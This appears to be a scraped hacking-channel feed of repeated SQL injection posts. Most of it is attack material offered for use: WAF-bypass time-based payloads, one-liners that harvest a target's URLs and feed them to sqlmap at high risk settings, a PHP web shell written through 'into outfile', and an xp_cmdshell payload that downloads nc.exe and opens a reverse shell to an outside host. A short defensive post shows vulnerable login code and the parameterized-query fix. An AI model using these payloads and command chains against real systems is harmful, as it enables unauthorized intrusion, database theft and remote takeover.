Bypass waf firewall
To increase the likelihood of a successful injection test using these random payloads, you can follow some approaches and techniques that vary the payloads based on how the database servers interpret the queries.
Using Substitutions in Keywords
You can substitute words like or, xor, and || to disable security filters.
Example:
. Entering camouflaged spaces and comments
Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:
using mathematical expressions
Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:
Changing the simple formula
The formula for simple payloads can also be changed.
Example:
Mixing multiple payloads in a single request
You can combine two or more payloads to increase complexity.
Example:
Entering different parentheses
Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:
Using Uncommon Phrases
Using uncommon or advanced phrases like benchmark instead of sleep may help avoid detection.
Example:
Logical Construct Tests
You can also test loads with logical constructs.
Example:
Complete
example:
Here are some more random payloads to use in your SQL injection test:
Combine some of these payloads:
You can mix payloads together to make the attack
more complex:
These payloads randomly diversify attacks that may pass through some filters or protection methods.
#waf #sql
To increase the likelihood of a successful injection test using these random payloads, you can follow some approaches and techniques that vary the payloads based on how the database servers interpret the queries.
Using Substitutions in Keywords
You can substitute words like or, xor, and || to disable security filters.
Example:
or sleep(4) ➔ oR sLeEP(4) or xor sleep(4)
. Entering camouflaged spaces and comments
Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:
or sleep(4) ➔ or//sleep(4) or or sLeEp(//4)
using mathematical expressions
Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:
4 ➔ 6-2 or true+true
Changing the simple formula
The formula for simple payloads can also be changed.
Example:
sleep(4) ➔ sleep((4)) or benchmark(4)
Mixing multiple payloads in a single request
You can combine two or more payloads to increase complexity.
Example:
%27 or sleep(4) -- ➔ %27 oR sLeEP(4) || true+true --
4|0 or benchmark(4) ➔ (4|0) oR beNCHMark(/**/4)
Entering different parentheses
Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:
or (sleep(4)) ➔ or %28sleep%2
84%29
Using Uncommon Phrases
Using uncommon or advanced phrases like benchmark instead of sleep may help avoid detection.
Example:
or sleep(4) ➔ or bench
mark(4)
Logical Construct Tests
You can also test loads with logical constructs.
Example:
or sleep(4) ➔ or (sleep(4) && true=true)
Complete
example:
' oR sLeEP(/**/4) || true+true --
Here are some more random payloads to use in your SQL injection test:
'%27 OR sleep(4) --
%28%29 XOR sLeEp(4) --
(4|0) oR beNCHMark(/**/4) --
' OR 6-2=4 || sleep(4) --
') OR true+true=sleep(4) --
%27 oR sLeEp(4) = (true) --
' xor sLeEP((4)) --
%27 = (1=(sleep(4))) --
%28%29 OR beNcHmArk(4) --
' XOR sleep(/**/4)
|| -true*4 --
Combine some of these payloads:
You can mix payloads together to make the attack
more complex:
'%27 OR sleep(4) || (true=true) -- ')
These payloads randomly diversify attacks that may pass through some filters or protection methods.
#waf #sql
❤6👍3
Metode untuk mencari kerentanan Sqli :
Command Line Tools Like a Pro
1.
2.
3.
4.
5.
#sqli #sql
Command Line Tools Like a Pro
1.
sublist3r -d target | tee -a domains.txt
2.
cat domains.txt | httpx | tee -a alive.txt
3.
cat alive.txt | waybackurls | tee -a urls.txt
4.
gf sqli urls >> sqli.txt
5.
sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent
#sqli #sql
❤5🔥2👏2👍1
SQLMap from Waybackurls
#sql
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"#sql
👍2👏2
Transition from SQL injection to shell or backdoor
We use the “into outfile” command to write to a file:
We capture the request in Burp Proxy and save it to the post-request file, then run
sqlmap:
reverse netcat shell via mssql injection when xp_cmdshell is available:
#sql #shell
We use the “into outfile” command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
We capture the request in Burp Proxy and save it to the post-request file, then run
sqlmap:
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
reverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#sql #shell
🦄3✍2🔥2❤1👍1
In SQLMap, the tamper module plays a crucial role by modifying or "tampering" with the SQL queries sent to the database. This helps bypass security mechanisms such as Web Application Firewalls (WAFs) or detection systems.
Tamper scripts manipulate SQL queries in various ways, making them less recognizable to security filters or even allowing the queries to slip through undetected. Here are some commonly used tamper scripts in SQLMap:
1- space2comment
Converts spaces in the query to comments (/**/) to make it less obvious to security mechanisms.
2- charunicodeencode
Encodes characters in the query into Unicode format, helping to evade detection by some systems
3- between
Uses the BETWEEN operator instead of = for comparisons in the query, which can bypass basic filters.
4- randomcase
Randomly changes the case of characters (uppercase/lowercase) in the query to make pattern recognition harder.
5- apostrophemask
Escapes single quotes (') by adding a backslash (\) before them to avoid detection.
6- equaltolike
Replaces = with LIKE in the query to bypass filters that detect equality operators.
7- space2dash
Converts spaces into dashes (--), which are considered comments in SQL, making the query less recognizable.
8- versionedkeywords
Adds version comments to SQL keywords, for example, turning SELECT into SELECT/*version*/, which can evade simple keyword filters.
You can use tamper modules in SQLMap by specifying the --tamper option. For example:
#sql #waf
Tamper scripts manipulate SQL queries in various ways, making them less recognizable to security filters or even allowing the queries to slip through undetected. Here are some commonly used tamper scripts in SQLMap:
1- space2comment
Converts spaces in the query to comments (/**/) to make it less obvious to security mechanisms.
2- charunicodeencode
Encodes characters in the query into Unicode format, helping to evade detection by some systems
3- between
Uses the BETWEEN operator instead of = for comparisons in the query, which can bypass basic filters.
4- randomcase
Randomly changes the case of characters (uppercase/lowercase) in the query to make pattern recognition harder.
5- apostrophemask
Escapes single quotes (') by adding a backslash (\) before them to avoid detection.
6- equaltolike
Replaces = with LIKE in the query to bypass filters that detect equality operators.
7- space2dash
Converts spaces into dashes (--), which are considered comments in SQL, making the query less recognizable.
8- versionedkeywords
Adds version comments to SQL keywords, for example, turning SELECT into SELECT/*version*/, which can evade simple keyword filters.
You can use tamper modules in SQLMap by specifying the --tamper option. For example:
sqlmap -u "http://example.com/vuln.php?id=1" --tamper="space2comment"
Each tamper script serves a specific purpose, and it's often necessary to experiment with different ones depending on the target's security mechanisms.
#sql #waf
❤5👍3
SQL injection: what is it and what is it used for? SQL injection is an attack that can lead to sensitive data being compromised and even an entire system takeover. It is important for developers and system administrators to be aware of this threat and take necessary measures to prevent it. Using prepared statements with parameterized queries, input validation and sanitization, and regular security checks can significantly reduce the risk of a successful attack. - Here is an example of code vulnerable to SQL injection:
In this example, the PHP script attempts to authenticate the user by checking the username and password against the entries in the Users table. However, there is a significant issue with this code: it directly includes user input (the $username and $password) in the SQL query without properly validating or sanitizing it.
Vulnerability
This lack of validation means that if malicious input is entered in the username or password fields, it may lead to unintended commands being executed. For instance, if an attacker inputs:
The resulting SQL query would look like this:
In this case, the -- sequence comments out the rest of the SQL query, effectively bypassing the password verification. As a result, the attacker could gain unauthorized access.
Prevention
To eliminate this vulnerability, user input must be validated and processed correctly. One effective method is to use parameterized query statements. This approach ensures that user input is treated as data rather than executable code. The modified query would look like this:
By using parameterized queries, the user input is treated as a string, preventing SQL injection attacks.
Conclusion
Always validate and sanitize user inputs and utilize parameterized queries to enhance the security of your applications against SQL injection attacks.
#sql
<?php
// Get username and password from the request
$username = $_POST["username"];
$password = $_POST["password"];
// Create SQL query to check credentials
$query = "SELECT * FROM users
WHERE username = '$username'
AND password = '$password'";
// Execute the query
$result = mysqli_query($connection, $query);
// Check if the login was successful
if (mysqli_num_rows($result) > 0) {
// Login successful
// Here you can redirect the user to the homepage or show a welcome message
} else {
// Login failed
// Here you can display an error message
}
?>
>
In this example, the PHP script attempts to authenticate the user by checking the username and password against the entries in the Users table. However, there is a significant issue with this code: it directly includes user input (the $username and $password) in the SQL query without properly validating or sanitizing it.
Vulnerability
This lack of validation means that if malicious input is entered in the username or password fields, it may lead to unintended commands being executed. For instance, if an attacker inputs:
username: admin' --
The resulting SQL query would look like this:
SELECT * FROM users WHERE username = 'admin' --' AND password = 'whatever_password_entered'
In this case, the -- sequence comments out the rest of the SQL query, effectively bypassing the password verification. As a result, the attacker could gain unauthorized access.
Prevention
To eliminate this vulnerability, user input must be validated and processed correctly. One effective method is to use parameterized query statements. This approach ensures that user input is treated as data rather than executable code. The modified query would look like this:
$stmt = $connection->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
By using parameterized queries, the user input is treated as a string, preventing SQL injection attacks.
Conclusion
Always validate and sanitize user inputs and utilize parameterized queries to enhance the security of your applications against SQL injection attacks.
#sql
👍8👏6❤4🔥1😁1
One liner to find sql Injection
#sql
cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done
#sql
❤7👍4🔥2